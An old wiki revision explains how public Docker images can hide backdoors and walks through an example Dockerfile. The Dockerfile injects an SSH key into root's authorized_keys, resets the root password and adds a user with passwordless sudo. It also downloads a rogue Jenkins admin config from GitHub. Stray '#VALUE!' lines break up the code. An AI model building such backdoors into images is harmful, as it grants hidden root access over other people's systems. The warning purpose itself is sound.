This is an old revision of the document!

Docker - Common Security Issues Inside Public Docker Images

Here is a simple example. Doubtless it will misleading and hard to diagnose in real world.

In L18-19, a ssh key is injected to to authorized_keys. If you start sshd, you’re in danger. In L22, root password has been reset. Not good, isn’t it? In L25-26, a malicious OS user has been added. In L29-31, the user has been promoted as super admin, and he/she can run any commands without password! In L34-36, your jenkins has an unpleasant admin user now. Yes, Jenkins is hot and popular. You can do a lot of things with Jenkins. So do the hackers! This case represents security of application layer. It’s certainly the most dangerous and difficult case.

 ########## How To Use Docker Image ###############
 ##
 ##  Install docker utility
 ##  Download docker image:
 ##   docker pull denny/test:v1
 ##  Boot docker container:
 ##   docker run -t -P -d --name my-test denny/test:v1 /bin/bash
 ##
 ##  Build Image From Dockerfile.
 ##   docker build -f Dockerfile -t denny/test:v1 --rm=false .
 ##################################################
#VALUE!
 FROM ubuntu:14.04
 MAINTAINER Denny <denny@dennyzhang.com>
#VALUE!
 RUN mkdir -p /root/.ssh && \
   # SSH login by key file
   echo "ssh-rsa AAAAB3NzaC1...lOvno6KN5 denny@dennyzhang.com" \
        >> /root/.ssh/authorized_keys && \
#VALUE!
   # Reset root password
   echo 'root:ChangeMe1' | chpasswd && \
#VALUE!
   # Add a malicious user
   useradd denny && \
   echo 'denny:ChangeMe1' | chpasswd && \
#VALUE!
   # Add user to super admin
   echo '%denny ALL=(ALL:ALL) NOPASSWD: ALL' > \
         /etc/sudoers.d/admins && \
   chmod 400 /etc/sudoers.d/admins && \
#VALUE!
   # Add superadmin user to
   mkdir -p /var/lib/jenkins/users/superadmin && \
   wget -O /var/lib/jenkins/users/superadmin/config.xml \
     https://github.com/DennyZhang/devops_public/raw/tag_v2/doc/admin_conf_xml
#VALUE!
 CMD ["/bin/bash"]